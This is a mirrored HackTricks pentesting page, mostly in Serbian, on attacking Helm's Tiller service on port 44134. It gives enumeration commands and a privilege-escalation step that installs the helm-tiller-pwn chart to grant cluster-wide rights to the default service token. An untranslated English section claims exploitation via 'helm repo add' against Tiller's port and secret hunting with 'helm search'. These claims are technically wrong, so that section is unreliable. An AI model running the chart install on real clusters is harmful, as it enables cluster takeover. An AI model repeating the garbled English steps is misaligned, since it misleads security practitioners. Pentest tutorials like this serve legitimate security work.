Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 13:13:41 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/44134-pentesting-tiller-helm.md
Translator workflow 6c06826974 Translated to Serbian
2024-02-10 13:11:20 +00:00

121 lines
7.4 KiB
Markdown
Raw Blame History

<details>
<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Drugi načini podrške HackTricks-u:
* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
</details>
# Osnovne informacije
Helm je **upravljač paketima** za Kubernetes. Omogućava pakovanje YAML fajlova i distribuciju istih u javnim i privatnim repozitorijumima. Ovi paketi se nazivaju **Helm Charts**. **Tiller** je **servis** koji se **podrazumevano pokreće** na portu 44134 i pruža uslugu.
**Podrazumevani port:** 44134
```
PORT STATE SERVICE VERSION
44134/tcp open unknown
```
# Enumeracija
Ako možete **izlistati podove i/ili servise** različitih imenskih prostora, izlistajte ih i potražite one koji imaju **"tiller" u svom imenu**:
```bash
kubectl get pods | grep -i "tiller"
kubectl get services | grep -i "tiller"
kubectl get pods -n kube-system | grep -i "tiller"
kubectl get services -n kube-system | grep -i "tiller"
kubectl get pods -n <namespace> | grep -i "tiller"
kubectl get services -n <namespace> | grep -i "tiller"
```
## Pentesting Tiller (Helm)
### Introduction
Tiller is the server-side component of Helm, a package manager for Kubernetes. It manages the deployment of charts, which are packages of pre-configured Kubernetes resources. Pentesting Tiller involves identifying security vulnerabilities and misconfigurations that could be exploited by an attacker.
### Enumeration
To begin the pentesting process, you need to enumerate the Tiller service. This can be done using tools like `nmap` or `masscan` to scan for open ports. The default port for Tiller is `44134`.
```bash
nmap -p 44134 <target_ip>
```
### Exploitation
Once you have identified an open Tiller port, you can attempt to exploit it. One common vulnerability is the lack of authentication, which allows anyone to connect to the Tiller server without credentials. This can be exploited using the `helm` command-line tool.
```bash
helm init --client-only
helm repo add stable http://<target_ip>:44134
helm search
```
### Post-Exploitation
After successfully exploiting Tiller, you can perform various post-exploitation activities. For example, you can search for sensitive information, such as Kubernetes secrets, by using the `helm search` command. Additionally, you can deploy malicious charts to gain persistence or execute arbitrary code on the Kubernetes cluster.
### Mitigation
To mitigate the risks associated with Tiller, it is recommended to follow these best practices:
1. Enable authentication for Tiller by configuring it with a secure authentication mechanism, such as TLS certificates or RBAC.
2. Restrict network access to the Tiller service by using firewalls or network policies.
3. Regularly update Helm and Tiller to ensure you have the latest security patches.
4. Use RBAC to limit the permissions of Tiller, ensuring it only has the necessary privileges to perform its functions.
5. Monitor Tiller logs for any suspicious activity or unauthorized access attempts.
By following these mitigation techniques, you can enhance the security of your Tiller installation and protect your Kubernetes cluster from potential attacks.
```bash
kubectl get pods -n kube-system
NAME READY STATUS RESTARTS AGE
kube-scheduler-controlplane 1/1 Running 0 35m
tiller-deploy-56b574c76d-l265z 1/1 Running 0 35m
kubectl get services -n kube-system
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
kube-dns ClusterIP 10.96.0.10 <none> 53/UDP,53/TCP,9153/TCP 35m
tiller-deploy ClusterIP 10.98.57.159 <none> 44134/TCP 35m
```
Takođe možete pokušati da pronađete ovu uslugu proverom porta 44134:
```bash
sudo nmap -sS -p 44134 <IP>
```
Jednom kada ste otkrili to, možete komunicirati s njim preuzimanjem klijentske aplikacije helm. Možete koristiti alate poput `homebrew`, ili pogledati [**zvaničnu stranicu izdanja**](https://github.com/helm/helm/releases)**.** Za više detalja ili druge opcije, pogledajte [vodič za instalaciju](https://v2.helm.sh/docs/using\_helm/#installing-helm).
Zatim, možete **izlistati uslugu**:
```
helm --host tiller-deploy.kube-system:44134 version
```
## Eskalacija privilegija
Podrazumevano je da je **Helm2** instaliran u **kube-system** namespace-u sa **visokim privilegijama**, pa ako pronađete uslugu i imate pristup njoj, to vam može omogućiti **eskalciju privilegija**.
Sve što trebate da uradite je da instalirate paket poput ovog: [**https://github.com/Ruil1n/helm-tiller-pwn**](https://github.com/Ruil1n/helm-tiller-pwn) koji će omogućiti **podrazumevani pristup tokena usluge svemu u celokupnom klasteru.**
```
git clone https://github.com/Ruil1n/helm-tiller-pwn
helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-pwn
/pwnchart
```
U [http://rui0.cn/archives/1573](http://rui0.cn/archives/1573) imate **objašnjenje napada**, ali u osnovi, ako pročitate datoteke [**clusterrole.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrole.yaml) i [**clusterrolebinding.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrolebinding.yaml) unutar _helm-tiller-pwn/pwnchart/templates/_ možete videti kako se **sve privilegije dodeljuju podrazumevanom token-u**.
<details>
<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Drugi načini podrške HackTricks-u:
* Ako želite da vidite **vašu kompaniju oglašenu u HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
</details>
Reference in a new issue View git blame Copy permalink